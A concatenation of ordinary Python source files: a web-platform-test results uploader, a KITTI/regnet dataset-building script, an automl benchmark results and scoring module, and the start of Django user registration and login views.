        shutil.rmtree(temp_dir)
    # Only reached on success (a failure above propagates after cleanup),
    # so download_url/summary_file_name are guaranteed to be bound here.
    logger.info('Notifying %s' % notify_url)
    status_code, response_text = notify(
        notify_url,
        notify_secret,
        {
            'browser_name': browser_name,
            'browser_version': browser_version,
            'os_name': os_name,
            'os_version': os_version,
            'revision': wpt_revision,
            'commit_date': wpt_revision_date,
            'results_url': '%s/%s' % (download_url, summary_file_name)
        }
    )
    logger.info('Response status code: %s', status_code)
    logger.info('Response text: %s', response_text)
    assert status_code >= 200 and status_code < 300
def each_result(raw_results_files):
    """Yield (relative_test_filename, raw_result) pairs from WPT report files.

    Each file must be a JSON document with a top-level "results" list whose
    entries carry a "test" attribute.
    """
    for report_path in raw_results_files:
        with open(report_path) as handle:
            report = json.load(handle)
        assert 'results' in report
        for raw_result in report['results']:
            assert 'test' in raw_result
            # "test" is a UNIX-style absolute path ("/dir/test.html");
            # drop the leading separator and re-join with the local OS
            # path separator.
            parts = raw_result['test'].split('/')[1:]
            yield os.path.sep.join(parts), raw_result
def upload(dir_name, location):
    """Mirror `dir_name` into the given gs:// location via `gsutil rsync`."""
    command = [
        'gsutil', '-m', '-h', 'Content-Encoding:gzip', 'rsync', '-r', dir_name,
        location
    ]
    # check_call raises CalledProcessError on any non-zero exit, so the
    # assert below is a belt-and-braces check kept from the original.
    return_code = subprocess.check_call(command)
    assert return_code == 0
def write_gzip_json(filepath, payload):
    """Serialize `payload` as JSON and write it gzip-compressed.

    'filepath' is a list of path segments joined with the OS path separator;
    any missing parent directories are created first.
    """
    filename = os.path.sep.join(filepath)
    # Create all non-existent directories in a specified path; the OSError
    # raised when they already exist is ignored.
    try:
        os.makedirs(os.path.dirname(filename))
    except OSError:
        pass
    with gzip.open(filename, 'wb') as f:
        payload_str = json.dumps(payload)
        # BUG FIX: gzip files opened in binary mode require bytes; writing
        # the unencoded str raises TypeError on Python 3.
        f.write(payload_str.encode('utf-8'))
def summarize(filenames):
    """Aggregate WPT report files into {test_file: [passing, total]} counts.

    The first element counts a passing test-level status (OK/PASS) plus
    passing subtests; the second counts the test itself plus all subtests.
    Raises AssertionError if a test file appears twice across the reports.
    """
    summary = {}
    for filename in filenames:
        with open(filename) as handle:
            data = json.load(handle)
        assert 'results' in data
        assert isinstance(data['results'], list)
        for result in data['results']:
            test_file = result['test']
            # BUG FIX: the original message was never interpolated (the
            # "% test_file" was missing) and stated the condition backwards
            # ("is not already present" on a duplicate-detection assert).
            assert test_file not in summary, (
                'test_file "%s" is already present in summary' % test_file)
            assert 'status' in result
            if result['status'] in ('OK', 'PASS'):
                summary[test_file] = [1, 1]
            else:
                summary[test_file] = [0, 1]
            assert 'subtests' in result
            assert isinstance(result['subtests'], list)
            for subtest in result['subtests']:
                assert 'status' in subtest
                if subtest['status'] == 'PASS':
                    summary[test_file][0] += 1
                summary[test_file][1] += 1
    return summary
def expand_os_version(name, version):
    '''Expand the string "*" to describe the version of the system running this
    script.

    This behavior assumes that the uploading script is run on the same platform
    from which the results were collected. This assumption may not always hold,
    but the functionality is implemented in order to satisfy the expectations
    of the data's consumer.'''
    # Explicit versions pass through untouched.
    if version != '*':
        return version
    if name != platform.system().lower():
        raise ValueError('Cannot expand version wildcard for a foreign system')
    # Take the leading "major.minor" pair from the kernel/OS release string.
    found = re.search(r'[0-9]+\.[0-9]+', platform.release())
    if found is None:
        raise ValueError('Cannot infer host platform version')
    return found.group(0)
def notify(url, secret, payload):
    """POST `payload` as JSON to `url` (secret sent as a query parameter).

    Returns a (status_code, response_text) tuple.
    """
    body = json.dumps(payload)
    response = requests.post(url, params={'secret': secret}, data=body)
    return (response.status_code, response.text)
# Command-line interface: every parameter of main() must be supplied as a
# required --flag (argparse converts the dashes to underscores, so the
# parsed namespace maps 1:1 onto main's keyword arguments).
parser = argparse.ArgumentParser(description=main.__doc__)
parser.add_argument('--raw-results-directory', required=True)
parser.add_argument('--platform-id', required=True)
parser.add_argument('--browser-name', required=True)
parser.add_argument('--browser-version', required=True)
parser.add_argument('--os-name', required=True)
parser.add_argument('--os-version', required=True)
parser.add_argument('--wpt-revision', required=True)
parser.add_argument('--wpt-revision-date', required=True)
parser.add_argument('--bucket-name', required=True)
parser.add_argument('--notify-url', required=True)
parser.add_argument('--notify-secret', required=True)

if __name__ == '__main__':
    main(**vars(parser.parse_args()))
|
<reponame>markrofail/multi-modal-deep-learning-for-vehicle-sensor-data-abstraction-and-attack-detection<gh_stars>0
import click
from src.helpers import frame_selector, paths, timeit
from src.helpers.flags import Verbose
from src.regnet.data import kitti
###############################################################################
# ENVIROMENT PARAMETERS #
###############################################################################
# Read the regnet configuration file once at import time.
config = paths.config.read(paths.config.regnet())
VERBOSE = config['ENVIROMENT_CONFIG']['VERBOSE']
###############################################################################
#                              DATASET PARAMETERS                             #
###############################################################################
# Total number of frames and the train/valid/test split percentages.
NUM_FRAMES = config['DATASET']['NUM_FRAMES']
TRAIN_PCT = config['DATASET']['TRAIN_PCT']
VALID_PCT = config['DATASET']['VALID_PCT']
TEST_PCT = config['DATASET']['TEST_PCT']
@click.command()
@click.option(
    '--keep', '-k',
    is_flag=True,
    help='keep redundant files',
)
@click.option(
    '--random/--kitti',
    is_flag=True,
)
@timeit.logtime
def main(keep=False, random=True):
    """Build the regnet train/valid/test datasets.

    With --random, frames are sampled randomly according to the configured
    split percentages; with --kitti, a fixed drive-based split is used.
    Intermediate files are removed afterwards unless --keep is given.
    """
    # choose the train, valid, test datasets randomly
    if random:
        datasets = frame_selector.generate_random(
            frame_count=NUM_FRAMES, train_pct=TRAIN_PCT, valid_pct=VALID_PCT, test_pct=TEST_PCT,
            log_path=paths.checkpoints.regnet().with_name('dataset'))
    else:
        # Fixed KITTI split: all 2011_09_26 drives except 5 and 70 train;
        # drives 5 and 70 validate; 2011_09_30 drive 28 is the test set.
        train_drives = paths.get_all_drives('2011_09_26', exclude=[5, 70])
        train_dataset = list()
        for drive_info in train_drives:
            train_dataset.extend(paths.get_all_frames(*drive_info))
        valid_drives = [('2011_09_26', 5), ('2011_09_26', 70)]
        valid_dataset = list()
        for drive_info in valid_drives:
            valid_dataset.extend(paths.get_all_frames(*drive_info))
        test_dataset = paths.get_all_frames('2011_09_30', 28)
        datasets = [train_dataset, valid_dataset, test_dataset]
    # generate each dataset
    datasets = zip(datasets, ['train', 'valid', 'test'])
    for dataset, name in datasets:
        make_data(dataset, name, keep=keep)
    if not keep:
        cleanUp()
def make_data(frames, name, verbose=VERBOSE, keep=False):
    """Generate one regnet dataset split ('train'/'valid'/'test') from frames.

    Pipeline: decalibration matrices -> projected depth maps -> rescaled
    images -> numpy tensors -> completeness check -> TFRecords.  When `keep`
    is False the kitti helpers discard their intermediate outputs.
    """
    if verbose > Verbose.SILENT:
        print('\nGenerating regnet/{} dataset...'.format(name.upper()))
    # generate a unique random decalibration matrix for every frame
    kitti.make_decalib.generate_frames(frames=frames, verbose=verbose)
    # project each lidar scan using the frame's Hinit (Hinit = decalibration * Hgt)
    kitti.make_depthmaps.generate_frames(
        frames=frames, calib_batches=True, color='gray', verbose=verbose)
    # ensure all images are of the same size (resize and crop all images)
    kitti.image_rescale.preproccess_frames(frames=frames, verbose=verbose, keep=keep)
    # convert images to numpy arrays
    kitti.make_tensors.generate_frames(frames=frames, data_type='rgb', verbose=verbose, keep=keep)
    kitti.make_tensors.generate_frames(frames=frames, data_type='depth', verbose=verbose, keep=keep)
    # check that every frame's data is complete (every frame has an rgb image, depthmap and Hinit)
    kitti.data_sanity.check_frames(frames=frames, verbose=verbose)
    # encode every frame into a TFrecord
    kitti.make_records.generate_frames(frames=frames, dataset=name, verbose=verbose, keep=keep)
def cleanUp(verbose=VERBOSE, force_all=False):
    """Delete intermediate data directories to reclaim disk space.

    Unless `force_all` is set, the final 'train'/'valid'/'test' folders are
    preserved; '.gitkeep' marker files are always preserved.
    """
    import shutil
    if verbose > Verbose.SILENT:
        print('\nRemoving redundant files to save space...')
    cleanup_roots = [paths.DATA_RAW_PATH,
                     paths.DATA_INTERIM_PATH,
                     paths.DATA_PROCESSED_PATH.joinpath('KITTI')]
    keep_dirs = [] if force_all else ['train', 'test', 'valid']
    keep_files = ['.gitkeep']
    for root in cleanup_roots:
        if not root.exists():
            continue
        if verbose > Verbose.SILENT:
            print(' # deleting {}/**'.format(root.parent.name))
        for entry in root.iterdir():
            if entry.is_dir():
                if entry.name not in keep_dirs:
                    shutil.rmtree(entry, ignore_errors=True)
            else:
                if entry.name not in keep_files:
                    entry.unlink()
if __name__ == '__main__':
main()
|
"""
**results** module provides the logic to format, save and read predictions generated by the *automl frameworks* (cf. ``TaskResult``),
as well as logic to compute, format, save, read and merge scores obtained from those predictions (cf. ``Result`` and ``Scoreboard``).
"""
from functools import partial
import collections
import io
import logging
import math
import os
import re
import statistics
import numpy as np
from numpy import nan, sort
import pandas as pd
from .data import Dataset, DatasetType, Feature
from .datautils import accuracy_score, confusion_matrix, f1_score, log_loss, balanced_accuracy_score, mean_absolute_error, mean_squared_error, mean_squared_log_error, r2_score, roc_auc_score, read_csv, write_csv, is_data_frame, to_data_frame
from .resources import get as rget, config as rconfig, output_dirs
from .utils import Namespace, backup_file, cached, datetime_iso, json_load, memoize, profile
log = logging.getLogger(__name__)
class NoResultError(Exception):
    """Raised when no result is available to compute scores from."""
    pass
# TODO: reconsider organisation of output files:
# predictions: add framework version to name, timestamp? group into subdirs?
class Scoreboard:
    """Collection of benchmark scores with CSV persistence.

    A scoreboard may cover all results, or be restricted to a framework,
    a benchmark and/or a task: that restriction determines the CSV file
    name used when loading/saving (cf. `_score_file`).
    """

    results_file = 'results.csv'

    @classmethod
    def all(cls, scores_dir=None):
        """Return a scoreboard over all results found in `scores_dir`."""
        return cls(scores_dir=scores_dir)

    @classmethod
    def from_file(cls, path):
        """Create a scoreboard from a scores file path.

        Framework/benchmark/task names are inferred from the file name.
        :return: a Scoreboard, or None if the name matches no known scheme.
        """
        sep = rconfig().token_separator
        folder, basename = os.path.split(path)
        framework_name = None
        benchmark_name = None
        task_name = None
        # patterns are tried in order, most specific naming scheme first
        patterns = [
            cls.results_file,
            rf"(?P<framework>[\w\-]+){sep}benchmark{sep}(?P<benchmark>[\w\-]+)\.csv",
            rf"benchmark{sep}(?P<benchmark>[\w\-]+)\.csv",
            rf"(?P<framework>[\w\-]+){sep}task{sep}(?P<task>[\w\-]+)\.csv",
            rf"task{sep}(?P<task>[\w\-]+)\.csv",
            r"(?P<framework>[\w\-]+)\.csv",
        ]
        found = False
        for pat in patterns:
            m = re.fullmatch(pat, basename)
            if m:
                found = True
                d = m.groupdict()
                # `name in d and d[name]` yields False when the group is absent,
                # and the captured string otherwise
                benchmark_name = 'benchmark' in d and d['benchmark']
                task_name = 'task' in d and d['task']
                framework_name = 'framework' in d and d['framework']
                break
        if not found:
            return None
        scores_dir = None if path == basename else folder
        return cls(framework_name=framework_name, benchmark_name=benchmark_name, task_name=task_name, scores_dir=scores_dir)

    @staticmethod
    # @profile(logger=log)
    def load_df(file):
        """Load a scores dataframe from a CSV path or an open file object.

        Returns an empty dataframe when the file does not exist.
        """
        name = file if isinstance(file, str) else type(file)
        log.debug("Loading scores from `%s`.", name)
        exists = isinstance(file, io.IOBase) or os.path.isfile(file)
        df = read_csv(file) if exists else to_data_frame({})
        log.debug("Loaded scores from `%s`.", name)
        return df

    @staticmethod
    # @profile(logger=log)
    def save_df(data_frame, path, append=False):
        """Save a scores dataframe to `path`.

        :param append: when True, rows are appended to an existing compatible
            file; otherwise (or when columns changed) the old file is backed up
            and a new one is written.
        """
        exists = os.path.isfile(path)
        new_format = False
        if exists:
            df = read_csv(path, nrows=1)
            # a change in columns forces a new file (old one is backed up)
            new_format = list(df.columns) != list(data_frame.columns)
        if new_format or (exists and not append):
            backup_file(path)
        new_file = not exists or not append or new_format
        is_default_index = data_frame.index.name is None and not any(data_frame.index.names)
        log.debug("Saving scores to `%s`.", path)
        write_csv(data_frame,
                  path=path,
                  header=new_file,
                  index=not is_default_index,
                  append=not new_file)
        log.info("Scores saved to `%s`.", path)

    def __init__(self, scores=None, framework_name=None, benchmark_name=None, task_name=None, scores_dir=None):
        """
        :param scores: pre-loaded scores (dataframe or iterable of mappings);
            loaded from the backing file when None.
        :param scores_dir: folder holding the scores files; defaults to the
            session's `scores` output directory.
        """
        self.framework_name = framework_name
        self.benchmark_name = benchmark_name
        self.task_name = task_name
        self.scores_dir = (scores_dir if scores_dir
                           else output_dirs(rconfig().output_dir, rconfig().sid, ['scores']).scores)
        self.scores = scores if scores is not None else self._load()

    @cached
    def as_data_frame(self):
        """Return the scores as a dataframe with a normalized column order."""
        # index = ['task', 'framework', 'fold']
        index = []
        df = (self.scores if is_data_frame(self.scores)
              else to_data_frame([dict(sc) for sc in self.scores]))
        if df.empty:
            # avoid dtype conversions during reindexing on empty frame
            return df
        fixed_cols = ['id', 'task', 'framework', 'constraint', 'fold', 'result', 'metric', 'mode', 'version',
                      'params', 'app_version', 'utc', 'duration', 'training_duration', 'predict_duration', 'models_count', 'seed', 'info']
        fixed_cols = [col for col in fixed_cols if col not in index]
        # extra (metric) columns are appended after the fixed ones, sorted by name
        dynamic_cols = [col for col in df.columns if col not in index and col not in fixed_cols]
        dynamic_cols.sort()
        df = df.reindex(columns=[]+fixed_cols+dynamic_cols)
        log.debug("Scores columns: %s.", df.columns)
        return df

    @cached
    def as_printable_data_frame(self):
        """Return the scores dataframe with values formatted for display/CSV output."""
        str_print = lambda val: '' if val in [None, '', 'None'] or (isinstance(val, float) and np.isnan(val)) else val
        int_print = lambda val: int(val) if isinstance(val, float) and not np.isnan(val) else str_print(val)
        num_print = lambda fn, val: None if isinstance(val, str) else fn(val)
        df = self.as_data_frame()
        force_str_cols = ['id']
        nanable_int_cols = ['fold', 'models_count', 'seed']
        low_precision_float_cols = ['duration', 'training_duration', 'predict_duration']
        # fix: np.float/np.object/np.str were deprecated aliases of the builtins
        # (removed in numpy >= 1.24); use the builtins directly.
        high_precision_float_cols = [col for col in df.select_dtypes(include=[float]).columns if col not in ([] + nanable_int_cols + low_precision_float_cols)]
        for col in force_str_cols:
            df[col] = df[col].astype(object).map(str_print).astype(str)
        for col in nanable_int_cols:
            df[col] = df[col].astype(object).map(int_print).astype(str)
        for col in low_precision_float_cols:
            # round-trip through a formatted string to truncate to 1 decimal
            df[col] = df[col].astype(float).map(partial(num_print, "{:.1f}".format)).astype(float)
        for col in high_precision_float_cols:
            df[col] = df[col].map(partial(num_print, "{:.6g}".format)).astype(float)
        return df

    def _load(self):
        """Load the scores from this scoreboard's backing file."""
        return self.load_df(self._score_file())

    def save(self, append=False):
        """Persist the formatted scores to this scoreboard's backing file."""
        self.save_df(self.as_printable_data_frame(), path=self._score_file(), append=append)

    def append(self, board_or_df, no_duplicates=True):
        """Return a new Scoreboard combining this one's scores with `board_or_df`'s."""
        to_append = board_or_df.as_data_frame() if isinstance(board_or_df, Scoreboard) else board_or_df
        # fix: DataFrame.append was deprecated and removed in pandas 2.0
        scores = pd.concat([self.as_data_frame(), to_append], sort=False)
        if no_duplicates:
            scores = scores.drop_duplicates()
        return Scoreboard(scores=scores,
                          framework_name=self.framework_name,
                          benchmark_name=self.benchmark_name,
                          task_name=self.task_name,
                          scores_dir=self.scores_dir)

    def _score_file(self):
        """Return the CSV path encoding this scoreboard's framework/benchmark/task restriction."""
        sep = rconfig().token_separator
        if self.framework_name:
            if self.task_name:
                file_name = f"{self.framework_name}{sep}task_{self.task_name}.csv"
            elif self.benchmark_name:
                file_name = f"{self.framework_name}{sep}benchmark_{self.benchmark_name}.csv"
            else:
                file_name = f"{self.framework_name}.csv"
        else:
            if self.task_name:
                file_name = f"task_{self.task_name}.csv"
            elif self.benchmark_name:
                file_name = f"benchmark_{self.benchmark_name}.csv"
            else:
                file_name = Scoreboard.results_file
        return os.path.join(self.scores_dir, file_name)
class TaskResult:
    """Handles predictions persistence and score computation for one (task, fold) run."""

    @staticmethod
    # @profile(logger=log)
    def load_predictions(predictions_file):
        """Load a predictions CSV and wrap it into the appropriate Result type.

        :return: a ClassificationResult (more than 2 columns), a RegressionResult
            (exactly 2 columns), or a NoResult when the file is missing.
        """
        log.info("Loading predictions from `%s`.", predictions_file)
        if os.path.isfile(predictions_file):
            df = read_csv(predictions_file, dtype=object)
            log.debug("Predictions preview:\n %s\n", df.head(10).to_string())
            if rconfig().test_mode:
                TaskResult.validate_predictions(df)
            if df.shape[1] > 2:
                return ClassificationResult(df)
            else:
                return RegressionResult(df)
        else:
            log.warning("Predictions file `%s` is missing: framework either failed or could not produce any prediction.", predictions_file)
            return NoResult("Missing predictions.")

    @staticmethod
    # @profile(logger=log)
    def save_predictions(dataset: Dataset, output_file: str,
                         predictions=None, truth=None,
                         probabilities=None, probabilities_labels=None,
                         target_is_encoded=False,
                         preview=True):
        """ Save class probabilities and predicted labels to file in csv format.

        :param dataset:
        :param output_file:
        :param probabilities:
        :param predictions:
        :param truth: ground truth; defaults to `dataset.test.y` when None.
        :param probabilities_labels: labels matching the `probabilities` columns.
        :param target_is_encoded: True when predictions/truth are label-encoded.
        :param preview: when True, log a preview of the saved frame.
        :return: None
        """
        log.debug("Saving predictions to `%s`.", output_file)
        remap = None
        if probabilities is not None:
            prob_cols = probabilities_labels if probabilities_labels else dataset.target.label_encoder.classes
            df = to_data_frame(probabilities, columns=prob_cols)
            if probabilities_labels:
                df = df[sort(prob_cols)]  # reorder columns alphabetically: necessary to match label encoding
                if any(prob_cols != df.columns.values):
                    # columns were reordered: map the framework's encoding
                    # onto the alphabetical one
                    encoding_map = {prob_cols.index(col): i for i, col in enumerate(df.columns.values)}
                    remap = np.vectorize(lambda v: encoding_map[v])
        else:
            df = to_data_frame(None)

        preds = predictions
        truth = truth if truth is not None else dataset.test.y
        if not _encode_predictions_and_truth_ and target_is_encoded:
            # values came in encoded but must be saved as labels: decode them
            if remap:
                predictions = remap(predictions)
                truth = remap(truth)
            preds = dataset.target.label_encoder.inverse_transform(predictions)
            truth = dataset.target.label_encoder.inverse_transform(truth)
        if _encode_predictions_and_truth_ and not target_is_encoded:
            preds = dataset.target.label_encoder.transform(predictions)
            truth = dataset.target.label_encoder.transform(truth)

        df = df.assign(predictions=preds)
        df = df.assign(truth=truth)
        if preview:
            log.info("Predictions preview:\n %s\n", df.head(20).to_string())
        backup_file(output_file)
        write_csv(df, path=output_file)
        log.info("Predictions saved to `%s`.", output_file)

    @staticmethod
    def validate_predictions(predictions: pd.DataFrame):
        """Sanity-check a predictions frame: column naming/order, numeric values,
        encoding consistency, and argmax agreement between probabilities and predictions."""
        names = predictions.columns.values
        assert len(names) >= 2, "predictions frame should have 2 columns (regression) or more (classification)"
        assert names[-1] == "truth", "last column of predictions frame must be named `truth`"
        # fix: message previously said "last column" for the `predictions` column too
        assert names[-2] == "predictions", "second to last column of predictions frame must be named `predictions`"
        if len(names) == 2:  # regression
            for name, col in predictions.items():
                pd.to_numeric(col)  # pandas will raise if we have non-numerical values
        else:  # classification
            predictors = names[:-2]
            probabilities, preds, truth = predictions.iloc[:, :-2], predictions.iloc[:, -2], predictions.iloc[:, -1]
            assert np.array_equal(predictors, np.sort(predictors)), "Predictors columns are not sorted in lexicographic order."
            assert set(np.unique(predictors)) == set(predictors), "Predictions contain multiple columns with the same label."
            for name, col in probabilities.items():
                pd.to_numeric(col)  # pandas will raise if we have non-numerical values
            if _encode_predictions_and_truth_:
                assert np.array_equal(truth, truth.astype(int)), "Values in truth column are not encoded."
                assert np.array_equal(preds, preds.astype(int)), "Values in predictions column are not encoded."
                predictors_set = set(range(len(predictors)))
                validate_row = lambda r: r[:-2].astype(float).values.argmax() == r[-2]
            else:
                predictors_set = set(predictors)
                validate_row = lambda r: r[:-2].astype(float).idxmax() == r[-2]
            truth_set = set(truth.unique())
            if predictors_set < truth_set:
                log.warning("Truth column contains values unseen during training: no matching probability column.")
            if predictors_set > truth_set:
                log.warning("Truth column doesn't contain all the possible target values: the test dataset may be too small.")
            predictions_set = set(preds.unique())
            assert predictions_set <= predictors_set, "Predictions column contains unexpected values: {}.".format(predictions_set - predictors_set)
            assert predictions.apply(validate_row, axis=1).all(), "Predictions don't always match the predictor with the highest probability."

    @classmethod
    def score_from_predictions_file(cls, path):
        """Compute scores for an existing predictions file, inferring
        framework/task/fold (and optionally benchmark/constraint) from its path."""
        sep = rconfig().token_separator
        folder, basename = os.path.split(path)
        folder_g = collections.defaultdict(lambda: None)
        if folder:
            # fix: inside an f-string `{8}`/`{6}` are replacement fields, so the
            # original pattern compiled to `\d8T\d6`; braces must be doubled to
            # get the intended `\d{8}T\d{6}` timestamp quantifiers.
            folder_pat = rf"/(?P<framework>[\w\-]+?){sep}(?P<benchmark>[\w\-]+){sep}(?P<constraint>[\w\-]+){sep}(?P<mode>[\w\-]+)({sep}(?P<datetime>\d{{8}}T\d{{6}}))/"
            folder_m = re.match(folder_pat, folder)
            if folder_m:
                folder_g = folder_m.groupdict()

        file_pat = rf"(?P<framework>[\w\-]+?){sep}(?P<task>[\w\-]+){sep}(?P<fold>\d+)\.csv"
        file_m = re.fullmatch(file_pat, basename)
        if not file_m:
            log.error("Predictions file `%s` has wrong naming format.", path)
            return None

        file_g = file_m.groupdict()
        framework_name = file_g['framework']
        task_name = file_g['task']
        fold = int(file_g['fold'])
        constraint = folder_g['constraint']
        benchmark = folder_g['benchmark']
        task = Namespace(name=task_name, id=task_name)
        if benchmark:
            try:
                tasks, _, _ = rget().benchmark_definition(benchmark)
                task = next(t for t in tasks if t.name == task_name)
            except Exception:
                # best effort: fall back to the minimal task namespace built above
                pass

        result = cls.load_predictions(path)
        task_result = cls(task, fold, constraint, '')
        # fix: compute_scores(self, result=None, meta_result=None) takes neither a
        # framework name nor a metrics list (both come from the metadata file);
        # the original call passed them positionally and raised a TypeError.
        # NOTE(review): this path still requires the fold's metadata.json to exist.
        return task_result.compute_scores(result=result)

    def __init__(self, task_def, fold: int, constraint: str, predictions_dir=None):
        """
        :param task_def: task definition namespace (must expose `name` and `id`).
        :param predictions_dir: folder containing `<task>/<fold>/predictions.csv`;
            any falsy value resolves to the session's default predictions dir.
        """
        self.task = task_def
        self.fold = fold
        self.constraint = constraint
        self.predictions_dir = (predictions_dir if predictions_dir
                                else output_dirs(rconfig().output_dir, rconfig().sid, ['predictions']).predictions)

    @memoize
    def get_result(self):
        """Load (once, memoized) and return the Result for this task/fold."""
        return self.load_predictions(self._predictions_file)

    def get_metadata(self):
        """Load the run metadata (framework, version, seed, metrics…) for this task/fold."""
        return json_load(self._metadata_file, as_namespace=True)

    @profile(logger=log)
    def compute_scores(self, result=None, meta_result=None):
        """Compute and return the scores namespace for this task/fold.

        :param result: pre-loaded Result; loaded from the predictions file when None.
        :param meta_result: extra information (durations, models count…) to merge into the scores.
        """
        meta_result = Namespace({} if meta_result is None else meta_result)
        metadata = self.get_metadata()
        scores = Namespace(
            id=self.task.id,
            task=self.task.name,
            constraint=self.constraint,
            framework=metadata.framework,
            version=metadata.version if 'version' in metadata else metadata.framework_version,
            params=str(metadata.framework_params) if len(metadata.framework_params) > 0 else '',
            fold=self.fold,
            mode=rconfig().run_mode,
            seed=metadata.seed,
            app_version=rget().app_version,
            utc=datetime_iso(),
            metric=metadata.metric,
            duration=nan
        )
        required_metares = ['training_duration', 'predict_duration', 'models_count']
        for m in required_metares:
            scores[m] = meta_result[m] if m in meta_result else nan
        result = self.get_result() if result is None else result
        for metric in metadata.metrics:
            score = result.evaluate(metric)
            scores[metric] = score
        # the main `result` score is the value of the preferred metric
        scores.result = scores[scores.metric] if scores.metric in scores else result.evaluate(scores.metric)
        scores.info = result.info
        # merge the remaining meta information into the scores namespace
        scores % Namespace({k: v for k, v in meta_result if k not in required_metares})
        log.info("Metric scores: %s", scores)
        return scores

    @property
    def _predictions_file(self):
        """Path of the predictions CSV for this task/fold."""
        return os.path.join(self.predictions_dir, self.task.name, str(self.fold), "predictions.csv")

    @property
    def _metadata_file(self):
        """Path of the metadata JSON for this task/fold."""
        return os.path.join(self.predictions_dir, self.task.name, str(self.fold), "metadata.json")
class Result:
    """Base wrapper around a predictions dataframe.

    The two trailing columns of the frame are expected to be, in order,
    `predictions` and `truth`; subclasses expose metric methods that
    `evaluate` dispatches to by name.
    """

    def __init__(self, predictions_df, info=None):
        self.df = predictions_df
        self.info = info
        if self.df is None:
            self.truth = None
            self.predictions = None
        else:
            # last column = truth, second to last = predictions
            self.truth = self.df.iloc[:, -1].values
            self.predictions = self.df.iloc[:, -2].values
        self.target = None
        self.type = None

    def evaluate(self, metric):
        """Return the value of `metric` (a method name on this object), or NaN if unsupported."""
        if not hasattr(self, metric):
            # raise ValueError("Metric {metric} is not supported for {type}.".format(metric=metric, type=self.type))
            log.warning("Metric %s is not supported for %s!", metric, self.type)
            return nan
        return getattr(self, metric)()
class NoResult(Result):
    """Sentinel result used when no predictions are available."""

    def __init__(self, info=None):
        super().__init__(None, info)
        # every metric evaluates to this value when there is no result
        self.missing_result = np.nan

    def evaluate(self, metric):
        """Always return the missing-result marker (NaN), regardless of `metric`."""
        return self.missing_result
class ErrorResult(NoResult):
    """NoResult carrying a (truncated) error description as its info."""

    def __init__(self, error):
        label = type(error).__qualname__ if error is not None else "Error"
        msg = "{}: {}".format(label, error)
        # truncate long messages to the configured limit, marking the cut with '...'
        max_len = rconfig().results.error_max_length
        if len(msg) > max_len:
            msg = msg[:max_len - 3] + '...'
        super().__init__(msg)
class ClassificationResult(Result):
    """Result for classification tasks: exposes class probabilities and classification metrics."""

    def __init__(self, predictions_df, info=None):
        super().__init__(predictions_df, info)
        # all columns except the trailing (predictions, truth) pair are per-class probabilities
        self.classes = self.df.columns[:-2].values.astype(str, copy=False)
        self.probabilities = self.df.iloc[:, :-2].values.astype(float, copy=False)
        self.target = Feature(0, 'class', 'categorical', values=self.classes, is_target=True)
        self.type = DatasetType.binary if len(self.classes) == 2 else DatasetType.multiclass
        # truth/predictions are label-encoded (when needed) for the metric functions below
        self.truth = self._autoencode(self.truth.astype(str, copy=False))
        self.predictions = self._autoencode(self.predictions.astype(str, copy=False))
        self.labels = self._autoencode(self.classes)

    def acc(self):
        """Accuracy."""
        return float(accuracy_score(self.truth, self.predictions))

    def balacc(self):
        """Balanced accuracy."""
        return float(balanced_accuracy_score(self.truth, self.predictions))

    def auc(self):
        """Area under the ROC curve (binary classification only); NaN otherwise."""
        if self.type != DatasetType.binary:
            # raise ValueError("AUC metric is only supported for binary classification: {}.".format(self.classes))
            log.warning("AUC metric is only supported for binary classification: %s.", self.labels)
            return nan
        return float(roc_auc_score(self.truth, self.probabilities[:, 1], labels=self.labels))

    def cm(self):
        """Confusion matrix over all known labels."""
        return confusion_matrix(self.truth, self.predictions, labels=self.labels)

    def _per_class_errors(self):
        """Per-class error rates, computed from the confusion matrix rows."""
        return [(s-d)/s for s, d in ((sum(r), r[i]) for i, r in enumerate(self.cm()))]

    def mean_pce(self):
        """mean per class error"""
        return statistics.mean(self._per_class_errors())

    def max_pce(self):
        """max per class error"""
        return max(self._per_class_errors())

    def f1(self):
        """F1 score.

        NOTE(review): f1_score is called without an `average` argument, which fails
        for multiclass targets unless the datautils wrapper supplies one — confirm.
        """
        return float(f1_score(self.truth, self.predictions, labels=self.labels))

    def logloss(self):
        """Log loss computed from the class probabilities."""
        return float(log_loss(self.truth, self.probabilities, labels=self.labels))

    def _autoencode(self, vec):
        """Label-encode `vec` unless it already holds encoded (digit-string) values."""
        needs_encoding = not _encode_predictions_and_truth_ or (isinstance(vec[0], str) and not vec[0].isdigit())
        return self.target.label_encoder.transform(vec) if needs_encoding else vec
class RegressionResult(Result):
    """Result for regression tasks, exposing the usual regression metrics."""

    def __init__(self, predictions_df, info=None):
        super().__init__(predictions_df, info)
        # the metric functions below require numeric ground truth
        self.truth = self.truth.astype(float, copy=False)
        self.target = Feature(0, 'target', 'real', is_target=True)
        self.type = DatasetType.regression

    def mae(self):
        """Mean absolute error."""
        return float(mean_absolute_error(self.truth, self.predictions))

    def mse(self):
        """Mean squared error."""
        return float(mean_squared_error(self.truth, self.predictions))

    def msle(self):
        """Mean squared log error."""
        return float(mean_squared_log_error(self.truth, self.predictions))

    def rmse(self):
        """Root mean squared error."""
        return math.sqrt(self.mse())

    def rmsle(self):
        """Root mean squared log error."""
        return math.sqrt(self.msle())

    def r2(self):
        """Coefficient of determination (R^2)."""
        return float(r2_score(self.truth, self.predictions))
# When True, predictions and truth are saved/validated label-encoded (integers)
# instead of as raw labels (cf. TaskResult.save_predictions / validate_predictions).
_encode_predictions_and_truth_ = False

# module-level alias kept for callers importing `save_predictions` directly
save_predictions = TaskResult.save_predictions
|
<filename>main/views.py
from django.shortcuts import render,redirect
from django.http import HttpRequest
from .forms import CreateUserForm
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.forms import UserCreationForm
from .models import Category, NewsDetail,Profile
from .forms import CreateUserForm, UserUpdateForm, ProfileUpdateForm
from django.contrib.auth.decorators import login_required
# Create your views here.
# creating my logic here
def registerPage(request):
    """Render the registration form and create a new user on valid POST."""
    if request.user.is_authenticated:
        return redirect('home')

    # fix: the original bound the form CLASS (`form = CreateUserForm`) instead of
    # an instance, so unbound GET rendering relied on Django instantiating it.
    form = CreateUserForm()
    if request.method == 'POST':
        form = CreateUserForm(request.POST)
        if form.is_valid():
            form.save()
            user = form.cleaned_data.get("username")
            messages.info(request, 'Account was created for ' + user)
            return redirect('login')

    context = {'form': form}
    return render(request, 'accounts/register.html', context)
# login logic here
def loginPage(request):
    """Authenticate a user from POSTed credentials and log them in."""
    if request.user.is_authenticated:
        return redirect('home')

    if request.method == "POST":
        username = request.POST.get('username')
